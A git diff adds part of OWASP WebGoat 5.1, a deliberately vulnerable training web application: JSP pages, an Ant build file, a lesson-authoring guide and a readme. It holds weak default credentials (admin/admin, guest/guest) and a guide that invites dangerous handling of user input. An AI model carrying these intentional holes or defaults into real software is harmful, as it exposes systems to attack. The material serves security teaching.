+	errorPage="" %>
+
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+%>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
+<title>Untitled Document</title>
+<link href="css/webgoat.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+	<div id=#wrap>
+	<%
+			String source = webSession.getSource();
+			if (source != null)
+			{
+				String printSource = "<div id=\"source\">" + source + "</div><br>";
+				out.println(printSource);
+			}
+	%>
+	</div>
+</body>
+</html>
diff --git a/main/project/WebContent/users/ReadMe.txt b/main/project/WebContent/users/ReadMe.txt
new file mode 100644
index 000000000..39f82909b
--- /dev/null
+++ b/main/project/WebContent/users/ReadMe.txt
@@ -0,0 +1 @@
+User-specific lesson state is stored under this directory.
\ No newline at end of file
diff --git a/main/project/WebContent/webgoat.jsp b/main/project/WebContent/webgoat.jsp
new file mode 100644
index 000000000..eece7b18d
--- /dev/null
+++ b/main/project/WebContent/webgoat.jsp
@@ -0,0 +1,124 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+	errorPage=""%>
+<%@page import="org.owasp.webgoat.session.WebSession"%>
+<%
+WebSession webSession = ((WebSession) session.getAttribute("websession"));
+%>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
+<title>WebGoat V5.1</title>
+<link rel="stylesheet" href="css/webgoat.css" type="text/css" />
+</head>
+
+<body>
+
+<div id="wrap">
+<div id="top"></div>
+<div id="start">
+<p>Thank you for using WebGoat!</p>
+<p>This program is a demonstration of common web application flaws.
+The exercises are intended to provide hands on experience with
+application penetration testing techniques. </p><p>The WebGoat project is lead
+by Bruce Mayhew. Please send all comments to Bruce at <%=webSession.getWebgoatContext().getFeedbackAddress()%>.</p>
+<div id="team">
+<table border="0" align="center" class="lessonText">
+	<tr>
+		<td width="50%">
+		<div align="center"><a href="http://www.owasp.org"><img
+			border="0" src="images/logos/owasp.jpg" alt="OWASP Foundation"
+			longdesc="http://www.owasp.org" /></a></div>
+		</td>
+		<td width="50%">
+		<div align="center"><a href="http://www.aspectsecurity.com"><img
+			border="0" src="images/logos/aspect.jpg" alt="Aspect Security"
+			longdesc="http://www.aspectsecurity.com" /></a></div>
+		</td>
+	</tr>
+	<tr>
+		<td width="50%">
+		<div align="center"><span class="style1"><br />
+		WebGoat Design Team </span></div>
+		</td>
+		<td width="50%">
+		<div align="center"><span class="style1"><br />
+		Lesson Contributers </span></div>
+		</td>
+	</tr>
+	<tr>
+		<td valign="top">
+		<div align="center" class="style2">Bruce Mayhew</div>
+		<div align="center" class="style2">David Anderson</div>
+		<div align="center" class="style2">Rogan Dawes</div>
+		<div align="center" class="style2">Laurence Casey (Graphics)</div>
+		</td>
+		<td valign="top">
+		<div align="center" class="style2">Aspect Security</div>
+		<div align="center" class="style2">Sherif Koussa</div>
+		<div align="center" class="style2">Romain Brechet</div>
+		<div align="center" class="style2"></div>
+
+		</td>
+	</tr>
+	<tr>
+		<td height="25" valign="bottom">
+		<div align="center"><span class="style1">Special Thanks
+		for V5.1</span></div>
+		</td>
+		<td height="25" valign="bottom">
+		<div align="center"><span class="style1">Documentation
+		Contributers</span></div>
+		</td>
+	</tr>
+	<tr>
+		<td>
+		<div align="center" class="style2">OWASP Spring of Code</div>
+		<div align="center" class="style2">Erwin Geirnaert<br />
+		(http://www.zionsecurity.com)<br />
+		</div>
+		</td>
+		<td>
+		<div align="center" class="style2">Sherif Koussa<br />
+		(http://www.macadamian.com)<br />
+		</div>
+		<div align="center" class="style2">Erwin Geirnaert<br />
+		(http://www.zionsecurity.com/)</div>
+		</td>
+	</tr>
+	<tr>
+		<td>
+		<div align="center" class="style2">To all who have sent comments</div>
+		</td>
+	</tr>
+	<tr>
+		<td colspan="2">
+		<div align="center" class="style2">
+		<form id="form" name="form" method="post" action="attack"><input
+			type="submit" name="start" value="Start WebGoat" /></form>
+		</div>
+		</td>
+	</tr>
+	<tr>
+		<td>
+		<div align="center" class="style2">&nbsp;</div>
+		</td>
+	</tr>
+</table>
+</div>
+</div>
+<div align="center" class="style2">&nbsp;</div>
+<div align="center" class="style2">&nbsp;</div>
+<div align="center" class="style2">&nbsp;</div>
+<div id="warning">WARNING<br />
+While running this program, your machine is extremely vulnerable to
+attack. You should disconnect from the network while using this program.
+<br />
+<br />
+This program is for educational purposes only. Use of these techniques
+without permission could lead to job termination, financial liability,
+and/or criminal penalties.</div>
+</div>
+</body>
+</html>
diff --git a/main/project/WebContent/webgoat_challenge.jsp b/main/project/WebContent/webgoat_challenge.jsp
new file mode 100644
index 000000000..eece7b18d
--- /dev/null
+++ b/main/project/WebContent/webgoat_challenge.jsp
@@ -0,0 +1,124 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+	errorPage=""%>
+<%@page import="org.owasp.webgoat.session.WebSession"%>
+<%
+WebSession webSession = ((WebSession) session.getAttribute("websession"));
+%>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
+<title>WebGoat V5.1</title>
+<link rel="stylesheet" href="css/webgoat.css" type="text/css" />
+</head>
+
+<body>
+
+<div id="wrap">
+<div id="top"></div>
+<div id="start">
+<p>Thank you for using WebGoat!</p>
+<p>This program is a demonstration of common web application flaws.
+The exercises are intended to provide hands on experience with
+application penetration testing techniques. </p><p>The WebGoat project is lead
+by Bruce Mayhew. Please send all comments to Bruce at <%=webSession.getWebgoatContext().getFeedbackAddress()%>.</p>
+<div id="team">
+<table border="0" align="center" class="lessonText">
+	<tr>
+		<td width="50%">
+		<div align="center"><a href="http://www.owasp.org"><img
+			border="0" src="images/logos/owasp.jpg" alt="OWASP Foundation"
+			longdesc="http://www.owasp.org" /></a></div>
+		</td>
+		<td width="50%">
+		<div align="center"><a href="http://www.aspectsecurity.com"><img
+			border="0" src="images/logos/aspect.jpg" alt="Aspect Security"
+			longdesc="http://www.aspectsecurity.com" /></a></div>
+		</td>
+	</tr>
+	<tr>
+		<td width="50%">
+		<div align="center"><span class="style1"><br />
+		WebGoat Design Team </span></div>
+		</td>
+		<td width="50%">
+		<div align="center"><span class="style1"><br />
+		Lesson Contributers </span></div>
+		</td>
+	</tr>
+	<tr>
+		<td valign="top">
+		<div align="center" class="style2">Bruce Mayhew</div>
+		<div align="center" class="style2">David Anderson</div>
+		<div align="center" class="style2">Rogan Dawes</div>
+		<div align="center" class="style2">Laurence Casey (Graphics)</div>
+		</td>
+		<td valign="top">
+		<div align="center" class="style2">Aspect Security</div>
+		<div align="center" class="style2">Sherif Koussa</div>
+		<div align="center" class="style2">Romain Brechet</div>
+		<div align="center" class="style2"></div>
+
+		</td>
+	</tr>
+	<tr>
+		<td height="25" valign="bottom">
+		<div align="center"><span class="style1">Special Thanks
+		for V5.1</span></div>
+		</td>
+		<td height="25" valign="bottom">
+		<div align="center"><span class="style1">Documentation
+		Contributers</span></div>
+		</td>
+	</tr>
+	<tr>
+		<td>
+		<div align="center" class="style2">OWASP Spring of Code</div>
+		<div align="center" class="style2">Erwin Geirnaert<br />
+		(http://www.zionsecurity.com)<br />
+		</div>
+		</td>
+		<td>
+		<div align="center" class="style2">Sherif Koussa<br />
+		(http://www.macadamian.com)<br />
+		</div>
+		<div align="center" class="style2">Erwin Geirnaert<br />
+		(http://www.zionsecurity.com/)</div>
+		</td>
+	</tr>
+	<tr>
+		<td>
+		<div align="center" class="style2">To all who have sent comments</div>
+		</td>
+	</tr>
+	<tr>
+		<td colspan="2">
+		<div align="center" class="style2">
+		<form id="form" name="form" method="post" action="attack"><input
+			type="submit" name="start" value="Start WebGoat" /></form>
+		</div>
+		</td>
+	</tr>
+	<tr>
+		<td>
+		<div align="center" class="style2">&nbsp;</div>
+		</td>
+	</tr>
+</table>
+</div>
+</div>
+<div align="center" class="style2">&nbsp;</div>
+<div align="center" class="style2">&nbsp;</div>
+<div align="center" class="style2">&nbsp;</div>
+<div id="warning">WARNING<br />
+While running this program, your machine is extremely vulnerable to
+attack. You should disconnect from the network while using this program.
+<br />
+<br />
+This program is for educational purposes only. Use of these techniques
+without permission could lead to job termination, financial liability,
+and/or criminal penalties.</div>
+</div>
+</body>
+</html>
diff --git a/main/project/build.xml b/main/project/build.xml
new file mode 100644
index 000000000..4c7de512b
--- /dev/null
+++ b/main/project/build.xml
@@ -0,0 +1,312 @@
+<!-- A "project" describes a set of targets that may be requested
+     when Ant is executed.  The "default" attribute defines the
+     target which is executed if no specific target is requested,
+     and the "basedir" attribute defines the current working directory
+     from which Ant executes the requested task.  This is normally
+     set to the current working directory.
+-->
+
+<project name="WebGoat" default="compile" basedir=".">
+
+<!-- ===================== Property Definitions =========================== -->
+
+<!--
+  Each of the following properties are used in the build script.
+  Values for these properties are set by the first place they are
+  defined, from the following list:
+
+  * Definitions on the "ant" command line (ant -Dfoo=bar compile).
+  * Definitions from a "build.properties" file in the top level
+    source directory of this application.
+  * Definitions from a "build.properties" file in the developer's
+    home directory.
+  * Default definitions in this build.xml file.
+  You will note below that property values can be composed based on the
+  contents of previously defined properties.  This is a powerful technique
+  that helps you minimize the number of changes required when your development
+  environment is modified.  Note that property composition is allowed within
+  "build.properties" files as well as in the "build.xml" script.
+-->
+
+  <property file="build.properties"/>
+  <property file="${user.home}/build.properties"/>
+
+<!-- ==================== File and Directory Names ======================== -->
+
+<!--
+  These properties generally define file and directory names (or paths) that
+  affect where the build process stores its outputs.
+
+  app.name             Base name of this application, used to
+                       construct filenames and directories.
+                       Defaults to "myapp".
+
+  app.path             Context path to which this application should be
+                       deployed (defaults to "/" plus the value of the
+                       "app.name" property).
+
+  app.version          Version number of this iteration of the application.
+
+  build.home           The directory into which the "prepare" and
+                       "compile" targets will generate their output.
+                       Defaults to "build".
+
+  catalina.home        The directory in which you have installed
+                       a binary distribution of Tomcat 4.  This will
+                       be used by the "deploy" target.
+
+  dist.home            The name of the base directory in which
+                       distribution files are created.
+                       Defaults to "dist".
+
+  manager.password     The login password of a user that is assigned the
+                       "manager" role (so that he or she can execute
+                       commands via the "/manager" web application)
+
+  manager.url          The URL of the "/manager" web application on the
+                       Tomcat installation to which we will deploy web
+                       applications and web services.
+
+  manager.username     The login username of a user that is assigned the
+                       "manager" role (so that he or she can execute
+                       commands via the "/manager" web application)
+-->
+
+  <property name="app.name"      		   value="WebGoat"/>
+  <property name="app.path"      		   value="/${app.name}"/>
+  <property name="app.version"   		   value="5.1"/> <!-- UPDATE THIS! -->
+  <property name="build.home"    		   value="${basedir}/build"/>
+  <property name="catalina.home" 		   value="${basedir}/../tomcat"/> <!-- UPDATE THIS! -->
+  <property name="dist.home"     		   value="${basedir}/dist"/>
+  <property name="web_inf.home"              value="${basedir}/build/WEB-INF"/>
+  <property name="doc.home"      		   value="${basedir}/doc"/>
+  <property name="manager.url"   		   value="http://localhost/manager"/>
+  <property name="manager.username"   	   value="admin"/> 			<!-- UPDATE THIS! -->
+  <property name="manager.password"   	   value="admin"/> 			<!-- UPDATE THIS! -->
+  <property name="src.home"     		   value="${basedir}/JavaSource"/>
+  <property name="web.home"      		   value="${basedir}/WebContent"/>
+  <property name="zip_distributions.home"  value="${basedir}/zip_distributions"/>
+
+<!-- ==================== External Dependencies =========================== -->
+
+<!--
+  Use property values to define the locations of external JAR files on which
+  your application will depend.  In general, these values will be used for
+  two purposes:
+  * Inclusion on the classpath that is passed to the Javac compiler
+  * Being copied into the "/WEB-INF/lib" directory during execution
+    of the "deploy" target.
+
+  Because we will automatically include all of the Java classes that Tomcat 4
+  exposes to web applications, we will not need to explicitly list any of those
+  dependencies.  You only need to worry about external dependencies for JAR
+  files that you are going to include inside your "/WEB-INF/lib" directory.
+-->
+
+  <property name="jars"      value="${basedir}/WebContent/WEB-INF/lib"/>
+
+<!-- ==================== Compilation Classpath =========================== -->
+
+<!--
+  Rather than relying on the CLASSPATH environment variable, Ant includes
+  features that makes it easy to dynamically construct the classpath you
+  need for each compilation.  The example below constructs the compile
+  classpath to include the servlet.jar file, as well as the other components
+  that Tomcat makes available to web applications automatically, plus anything
+  that you explicitly added.
+-->
+
+  <path id="compile.classpath">
+    <!-- Include all JAR files that will be included in /WEB-INF/lib -->
+    <!-- Include all elements that Tomcat exposes to applications -->
+	<fileset dir="${jars}">
+		<include name="*.jar"/>
+	</fileset> 
+    <pathelement location="${catalina.home}/common/classes"/>
+    <fileset dir="${catalina.home}/common/lib">
+      <include name="*.jar"/>
+    </fileset>
+     <fileset dir="${catalina.home}/server/lib">
+      <include name="*.jar"/>
+    </fileset>
+ </path>
+
+<!--  ==================== Compilation Control Options ==================== -->
+
+<!--
+  These properties control option settings on the Javac compiler when it
+  is invoked using the <javac> task.
+
+  compile.debug        Should compilation include the debug option?
+  compile.deprecation  Should compilation include the deprecation option?
+  compile.optimize     Should compilation include the optimize option?
+-->
+
+  <property name="compile.debug"       value="true"/>
+  <property name="compile.deprecation" value="false"/>
+  <property name="compile.optimize"    value="true"/>
+
+<!-- ==================== Clean Target ==================================== -->
+
+<!--
+  The "clean" target deletes any previous "build" and "dist" directory,
+  so that you can be ensured the application can be built from scratch.
+-->
+
+  <target name="clean"
+   description="Delete old build and dist directories">
+    <delete file="${web_inf.home}/web.xml"/>
+    <delete dir="${build.home}"/>
+ 	<delete dir="${dist.home}"/>
+	<delete dir="${catalina.home}/logs"/>
+	<delete dir="${catalina.home}/work/Catalina/localhost"/>
+ 	<delete dir="${catalina.home}/webapps/${app.name}"/>
+	<delete file="${catalina.home}/webapps/${app.name}.war"/>
+	<delete dir="${catalina.home}/server/webapps/${app.name}"/>
+  	<!-- 	<delete dir="${doc.home}"/> -->
+    <mkdir dir="${build.home}"/>
+    <mkdir dir="${dist.home}"/>
+ 	<mkdir dir="${doc.home}"/>
+ 	<mkdir dir="${catalina.home}/logs"/>
+ </target>
+
+  <target name="clean_all"
+   description="Delete old build, dist directories and zips">
+ 	<delete dir="${zip_distributions.home}"/>
+ 	<mkdir dir="${zip_distributions.home}"/>
+  </target>
+	
+<!-- ==================== Compile Target ================================== -->
+
+<!--
+  The "compile" target transforms source files (from your "src" directory)
+  into object files in the appropriate location in the build directory.
+  This example assumes that you will be including your classes in an
+  unpacked directory hierarchy under "/WEB-INF/classes".
+-->
+
+  <target name="compile"
+   description="Compile Java sources">
+    <!-- Compile Java classes as necessary -->
+    <mkdir    dir="${build.home}/WEB-INF/classes"/>
+    <javac srcdir="${src.home}"
+          destdir="${build.home}/WEB-INF/classes"
+            debug="${compile.debug}"
+      deprecation="${compile.deprecation}"
+         optimize="${compile.optimize}">
+        <classpath refid="compile.classpath"/>
+    </javac>
+  </target>
+
+<!-- ==================== Dist Target ===================================== -->
+
+<!--
+  The "dist" target creates a binary distribution of your application
+  in a directory structure ready to be archived in a tar.gz or zip file.
+  Note that this target depends on two others:
+
+  * "compile" so that the entire web application (including external
+    dependencies) will have been assembled
+-->
+
+  
+  <target name="DeployWar" 
+   	description="Copy existing war to Tomcat - Does not rebuild">
+
+    <!-- Install war to Tomcat -->
+    <delete dir="${catalina.home}/webapps/${app.name}"/>
+    <delete file="${catalina.home}/webapps/${app.name}.war"/>
+    <copy file="${dist.home}/${app.name}-${app.version}.war" tofile="${catalina.home}/webapps/${app.name}.war"/>
+	 
+  </target> 
+  	
+	
+<!-- =================== Internal Tasks to prepare war file  ============ -->
+
+	<!-- Copying the Java source code into the build directory -->
+	<!-- We must also copy the source into WebContent, since WTP will overwrite the 
+		app as it was deployed from the WAR. -->
+	<!-- We must also copy the doc dir into WebContent, for the "how to create a new lesson" lesson -->
+	<target name="-CopySourceToBuild" depends="prepare" >
+		<delete dir="${build.home}/JavaSource"/>
+		<copy todir="${build.home}/JavaSource">
+			<fileset dir="${basedir}/JavaSource"/>
+		</copy>
+		<delete dir="${web.home}/JavaSource"/>
+		<copy todir="${web.home}/JavaSource">
+			<fileset dir="${basedir}/JavaSource"/>
+		</copy>
+		<delete dir="${web.home}/doc"/>
+		<copy todir="${web.home}/doc">
+			<fileset dir="${basedir}/doc"/>
+		</copy>
+	</target>
+
+	
+	<!-- Copying web.xml to web-inf/web.xml -->
+	<target name="-WebXML">
+		<copy file="${web.home}/WEB-INF/web.xml" todir="${web_inf.home}" overwrite="yes"/>
+	</target>
+
+	<!-- Copying webgoat-owasp.properties to webgoat.properties -->
+	<target name="WebGoatPropertiesOWASP">
+		<attrib file="${web.home}/WEB-INF/webgoat.properties" readonly="false"/>
+		<copy file="${web.home}/WEB-INF/webgoat-owasp.properties" tofile="${web.home}/WEB-INF/webgoat.properties" overwrite="yes"/>
+	</target>
+				
+	<!-- Copying webgoat-class.properties to webgoat.properties -->
+	<target name="WebGoatPropertiesClass">
+		<attrib file="${web.home}/WEB-INF/webgoat.properties" readonly="false"/>
+		<copy file="${web.home}/WEB-INF/webgoat-class.properties" tofile="${web.home}/WEB-INF/webgoat.properties" overwrite="yes"/>
+	</target>
+				
+	<!-- Copying webgoat-lab.properties to webgoat.properties -->
+	<target name="WebGoatPropertiesLAB">
+		<attrib file="${web.home}/WEB-INF/webgoat.properties" readonly="false"/>
+		<copy file="${web.home}/WEB-INF/webgoat-lab.properties" tofile="${web.home}/WEB-INF/webgoat.properties" overwrite="yes"/>
+	</target>
+				
+	<!-- Copying the static content into the build directory -->
+	<target name="-CopyWebToBuild" depends="prepare" >
+		<copy todir="${build.home}">
+			<fileset dir="${web.home}"/>
+		</copy>
+	</target>
+
+	<target name="-WarBuild" >
+	    <jar jarfile="${dist.home}/${app.name}-${app.version}.war"
+	         basedir="${build.home}" />
+	</target>
+	
+<!-- =================== Prepare Distributions ========================== -->
+		
+	<!-- Create WAR file -->
+	<target name="BuildWar" depends="clean, prepare, compile, -WebXML, -CopyWebToBuild, -CopySourceToBuild, -WarBuild"
+			description="Create ${app.name}.war binary distribution">
+	</target> 	
+
+<!-- ==================== Prepare Target ================================== -->
+
+<!--
+  The "prepare" target is used to create the "build" destination directory,
+  and copy the static contents of your web application to it.  If you need
+  to copy static files from external dependencies, you can customize the
+  contents of this task.
+
+  Normally, this task is executed indirectly when needed.
+-->
+
+	<target name="prepare">
+		<!-- Create build directories as needed -->
+		<mkdir  dir="${build.home}/WEB-INF/classes"/>  
+
+		<!-- Copy application resources -->
+		<copy  todir="${build.home}/WEB-INF/classes">
+			<fileset dir="${src.home}" excludes="**/*.java"/>
+		</copy>
+	</target>
+
+</project>
+
+
+
diff --git a/main/project/doc/New Lesson Instructions.txt b/main/project/doc/New Lesson Instructions.txt
new file mode 100644
index 000000000..1f8cd5246
--- /dev/null
+++ b/main/project/doc/New Lesson Instructions.txt	
@@ -0,0 +1,189 @@
+Detailed instructions for adding a lesson
+
+All you have to do is implement the abstract methods in LessonAdapter.  
+Follow the outline below.
+
+WebGoat uses the Element Construction Set from the Jakarta project.  
+You should read up on the API for ECS at 
+http://jakarta.apache.org/site/downloads/downloads_ecs.cgi.
+In addition you can look at the other lessons for examples of how to use the ECS.
+
+
+
+Step 1: Set up the framework
+
+import java.util.*;
+import org.apache.ecs.*;
+import org.apache.ecs.html.*;
+
+// Add copyright text - use text from another lesson 
+
+public class NewLesson extends LessonAdapter
+{
+
+	protected Element createContent(WebSession s)
+	{
+		return( new StringElement( "Hello World" ) );
+	}
+
+	public String getCategory()
+	{
+	}
+
+	protected List getHints()
+	{
+	}
+
+	protected String getInstructions()
+	{
+	}
+
+	protected Element getMenuItem()
+	{
+	}
+
+	protected Integer getRanking()
+	{
+	}
+
+	public String getTitle()
+	{
+	}
+}
+		
+
+
+Step 2: Implement createContent
+
+Creating the content for a lesson is fairly simple. There are two main parts: 
+	(1) handling the input from the user's last request, 
+	(2) generating the next screen for the user.  
+This all happens within the createContent method.  Remember that each lesson 
+should be handled on a single page, so you'll need to design your lesson to 
+work that way.  A good generic pattern for the createContent method is shown 
+below:
+
+// define a constant for the field name
+private static final String INPUT = "input";
+	
+protected Element createContent(WebSession s)
+{
+	ElementContainer ec = new ElementContainer();
+	try
+	{
+		// get some input from the user -- see ParameterParser 
+		// for details
+		String userInput = s.getParser().getStringParameter(INPUT, "");
+
+		// do something with the input
+		//   -- SQL query?
+		//   -- Runtime.exec?
+		//   -- Some other dangerous thing
+			
+		// generate some output -- a string and an input field
+		ec.addElement(new StringElement("Enter a string: "));
+		ec.addElement( new Input(Input.TEXT, INPUT, userInput) );
+			
+		// Tell the lesson tracker the lesson has completed.
+		// This should occur when the user has 'hacked' the lesson.
+		makeSuccess(s);
+
+	}
+	catch (Exception e)
+	{
+		s.setMessage("Error generating " + this.getClass().getName());
+		e.printStackTrace();
+	}
+	return (ec);
+}
+	
+ECS is quite powerful -- see the Encoding lesson for an example of how 
+to use it to create a table with rows and rows of output.
+
+
+Step 3: Implement the other methods
+
+The other methods in the LessonAdapter class help the lesson plug into 
+the overall WebGoat framework.  They are simple and should only take a 
+few minutes to implement.
+
+public String getCategory()
+{
+	// The default category is "General" Only override this
+	// method if you wish to create a new category or if you
+	// wish this lesson to reside within a category other the
+	// "General"
+		
+	return( "NewCategory" );  // or use an existing category
+}
+
+protected List getHints()
+{
+	// Hints will be returned to the user in the order they 
+	// appear below.  The user must click on the "next hint"
+	// button before the hint will be displayed.
+		
+	List hints = new ArrayList();
+	hints.add("A general hint to put users on the right track");
+	hints.add("A hint that gives away a little piece of the problem");
+	hints.add("A hint that basically gives the answer");
+	return hints;
+}
+
+protected String getInstructions()
+{
+	// Instructions will rendered as html and will appear below
+	// the area and above the actual lesson area.
+	// Instructions should provide the user with the general setup
+	// and goal of the lesson.
+		
+	return("The text that goes at the top of the page");
+}
+
+protected Element getMenuItem()
+{
+	// This is the text of the link that will appear on
+	// the left hand menus under the appropriate category.
+	// Their is a limited amount of horizontal space in
+	// this area before wrapping will occur.
+		
+	return( "MyLesson" );
+}
+
+protected Integer getRanking()
+{
+	// The ranking denotes the order in which the menu item
+	// will appear in menu list for each category.  The lowest
+	// number will appear as the first lesson.
+		
+	return new Integer(10);
+}
+
+public String getTitle()
+{
+	// The title of the lesson.  This will appear above the
+	// control area at the top of the page.  This field will
+	// be rendered as html.
+		
+	return ("My Lesson's Short Title");
+}
+
+
+Step 4: Build and test
+
+Once you've implemented your new lesson, you can test the lesson by
+starting the Tomcat server (within Eclipse). See the
+"HOW TO create the WebGoat workspace.txt" document in the WebGoat root.
+
+
+
+	
+Step 5: Give back to the community
+
+If you've come up with a lesson that you think helps to teach people about 
+web application security, please contribute it by sending it to the people 
+who maintain the WebGoat application.
+
+Thanks!
+
+The WebGoat Team.
diff --git a/main/project/doc/Solving the WebGoat Labs.doc b/main/project/doc/Solving the WebGoat Labs.doc
new file mode 100644
index 000000000..a1f89160c
Binary files /dev/null and b/main/project/doc/Solving the WebGoat Labs.doc differ
diff --git a/main/project/doc/WebGoat_Users_Guide.doc b/main/project/doc/WebGoat_Users_Guide.doc
new file mode 100644
index 000000000..a755343bf
Binary files /dev/null and b/main/project/doc/WebGoat_Users_Guide.doc differ
diff --git a/main/readme.txt b/main/readme.txt
new file mode 100644
index 000000000..796fbe0b6
--- /dev/null
+++ b/main/readme.txt
@@ -0,0 +1,202 @@
+**********          WebGoat 5.1
+**********          Jan/08/2008
+**********
+**
+**  Source Code:  http://code.google.com/p/webgoat
+**  Download:     http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61824
+**  Download:     http://code.google.com/p/webgoat/downloads/list   (Does not have Windows release)
+**  User Guide:   http://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents
+**  Home Page:    http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
+**  Contact Info: webgoat@owasp.org
+**
+**********
+
+Thank you for downloading WebGoat!
+
+This program is a demonstration of common server-side
+application flaws.  The exercises are intended to
+be used by people to learn about application penetration
+testing techniques.
+
+
+WARNING 1: While running this program your machine will be 
+extremely vulnerable to attack. You should to disconnect
+from the Internet while using this program.
+
+WARNING 2: This program is for educational purposes only. If you
+attempt these techniques without authorization, you are very
+likely to get caught.  If you are caught engaging in unauthorized
+hacking, most companies will fire you. Claiming that you were
+doing security research will not work as that is the first thing
+that all hackers claim.
+
+You can find more information about WebGoat at:
+http://code.google.com/p/webgoat
+
+CREDITS (Latest release)
+
+	Bruce Mayhew (http://www.ouncelabs.com)
+	Rogan Dawes (http://dawes.za.net/rogan)
+	Eric Sheridan (http://www.aspectsecurity.com) 
+	Erwin Geirnaert (http://www.zionsecurity.com)
+	The many people who have sent comments and suggestions...
+
+        
+WHAT'S NEW
+
+	* WebGoat is now current at Google code. (http://code.google.com/p/webgoat)
+	* Database Lessons
+	* XSS Phishing 
+	* Lesson Solutions 
+	* Many upgrades and minor fixes
+
+
+RELEASES
+
+WebGoat-OWASP_Standard-x.x.zip
+    - Unzip and run version
+    - Includes java and tomcat
+
+WebGoat-OWASP_Developer-x.x.zip
+    - Includes standard version
+    - Developer version has eclipse and eclipse workspace
+
+
+
+INSTALLATION
+
+Windows - (Download, Extract, Double Click Release)
+
+1. unzip the WebGoat-OWASP_Standard-x.x.zip to your working environment 
+2. To start Tomcat, browse to the WebGoat directory unzipped above and 
+     double click "webgoat.bat"
+3. start your browser and browse to... (Notice the capital 'W' and 'G')
+	 http://localhost/WebGoat/attack
+4. login in as: user = guest, password = guest
+5. To stop WebGoat, simply close the window you launched it from.
+
+Note: When intercepting requests via a proxy with IE7.  You must add a '.' to the
+      end of localhost.  This is only valid for IE7:
+          http://localhost./WebGoat/attack        or
+          http://localhost.8080/WebGoat/attack    if using a non standard port
+      all other browsers should use:
+ 	      http://localhost/WebGoat/attack
+      
+
+
+Linux
+
+1. Download and install Java JDK 1.5 from Sun (http://java.sun.com)
+2. Unzip the WebGoat-OWASP_Standard-x.x.zip to your working directory
+3. Set JAVA_HOME to point to your JDK1.5 installation
+4. chmod +x webgoat.sh 
+5. Since the latest version runs on a privileged port, you will need to start/stop WebGoat as root.
+	sudo sh webgoat.sh start
+	sudo sh webgoat.sh stop
+6. start your browser and browse to... (Notice the capital 'W' and 'G')
+	http://localhost/WebGoat/attack
+7. login in as: user = guest, password = guest
+
+
+OS X (Tiger 10.4+)
+
+1. Unzip the WebGoat-OWASP_Standard-x.x.zip to your working directory
+2. chmod +x webgoat.sh
+3. Since the latest version runs on a privileged port, you will need to start/stop WebGoat as root.
+	sudo sh webgoat.sh start
+	sudo sh webgoat.sh stop
+4. start your browser and browse to... (Notice the capital 'W' and 'G')
+	http://localhost/WebGoat/attack
+5. login in as: user = guest, password = guest
+
+
+DEVELOPER INSTALLATION
+
+1. Download WebGoat-OWASP_Developer-x.x.zip source distribution
+2. Unzip the WebGoat-OWASP_Developer-x.x.zip to your working directory
+3. Follow the directions in HOW TO create the WebGoat workspace.txt
+
+
+HOW WEBGOAT WORKS
+
+TROUBLESHOOTING/FAQs:
+Q. I put the OWASP downloaded war file in my tomcat/webapps directory and the 
+   http://localhost/WebGoat/attack url doesn't work.
+A. Rename the downloaded war file to WebGoat.war.  Delete the existing tomcat/webapps/*WebGoat* directories.
+
+
+Q. I dropped the WebGoat war file into my non-Tomcat application server and WebGoat doesn't seem to work.
+A. WebGoat uses some of the internal Tomcat classes for user management.  Unfortunately, this makes 
+   WebGoat dependent on Tomcat.  Hopefully, this will be addressed in a future release.
+
+
+Q. Having problems with the ant file working properly. How do I configure my ant environment 
+   so that I don't receive errors such as:
+	- "Specified VM install not found: type Standard VM, name j2sdk1.4.2.06"
+A. This usually indicates an Eclipse environment setting misconfiguration. Here are some possible solutions:
+	i. Ant Runtime Configuration
+		- Window > Preferences
+		- Ant > Runtime
+		- Under Classpath Tab check the "Global Entries"
+		- Remove any jre "tools.jar" references
+		- Add the "\tomcat\servers\lib\catalina-ant.jar" file.
+		- Click Apply, Click OK.
+		- Return to the Ant View and refresh.
+
+
+Q. When I start up WebGoat it dies very quickly.
+A. WebGoat is a Java application that runs on Tomcat using port 80.  If you have another 
+   application listening on port 80 (like IIS), you will need to change WebGoat's port 
+   (to 8080 or something) in the tomcat_root/conf/server.xml file.
+
+
+Q. When I deploy the war file to the Tomcat wepapps directory, I can't login to WebGoat
+A. You need to add the webgoat users and roles to tomcat/conf/tomcat-users.xml
+
+    <?xml version="1.0" encoding="UTF-8"?>
+    <tomcat-users>
+      <role rolename="webgoat_basic"/>
+      <role rolename="webgoat_admin"/>
+      <role rolename="webgoat_user"/>
+      <role rolename="tomcat"/>
+      <user password="webgoat" roles="webgoat_admin" username="webgoat"/>
+      <user password="basic" roles="webgoat_user,webgoat_basic" username="basic"/>
+      <user password="tomcat" roles="tomcat" username="tomcat"/>
+      <user password="guest" roles="webgoat_user" username="guest"/>
+    </tomcat-users>
+
+
+Q. How do I get configure WebGoat to run on an IP other then localhost?
+A. In the webgoat.bat file, in the root directory, the following lines
+   are executed: 
+
+      delete .\tomcat\conf\server.xml 
+      copy .\tomcat\conf\server_80.xml .\tomcat\conf\server.xml 
+
+   This will overwrite any changes you may have made to server.xml 
+   file that addressed this issue.... 
+
+   By changing the server_80.xml file (or by removing the above code
+   from webgoat.bat, after making your changes) you can reflect your
+   changes to the Tomcat configuration. You will need to change the IP
+   address in the server_80.xml file to be the IP of the host machine.
+
+   The following connectors should be modified
